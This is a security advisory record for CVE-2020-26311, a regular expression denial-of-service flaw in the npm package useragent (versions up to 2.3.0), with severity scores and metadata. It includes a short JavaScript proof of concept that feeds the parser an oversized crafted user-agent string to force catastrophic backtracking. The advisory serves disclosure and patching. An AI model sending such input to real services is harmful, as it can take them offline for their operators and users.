CVE-2020-26311 – useragent

Package

Manager: npm
Name: useragent
Vulnerable Version: >=0 <=2.3.0

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/U:Green

EPSS: 0.00261 pctl0.4929

Details

useragent Regular Expression Denial of Service vulnerability Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). ## PoC ```js async function exploit() { const useragent = require(\"useragent\"); // Create a malicious user-agent that leads to excessive backtracking const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0'; // Parse the malicious user-agent const agent = useragent.parse(maliciousUserAgent); // Call the toString method to trigger the vulnerability const result = await agent.device.toString(); console.log(result); } await exploit(); ```

Metadata

Created: 2024-10-26T21:30:47Z
Modified: 2025-09-03T15:17:53Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-mgfv-m47x-4wqp/GHSA-mgfv-m47x-4wqp.json
CWE IDs: ["CWE-1333"]
Alternative ID: GHSA-mgfv-m47x-4wqp
Finding: F211
Auto approve: 1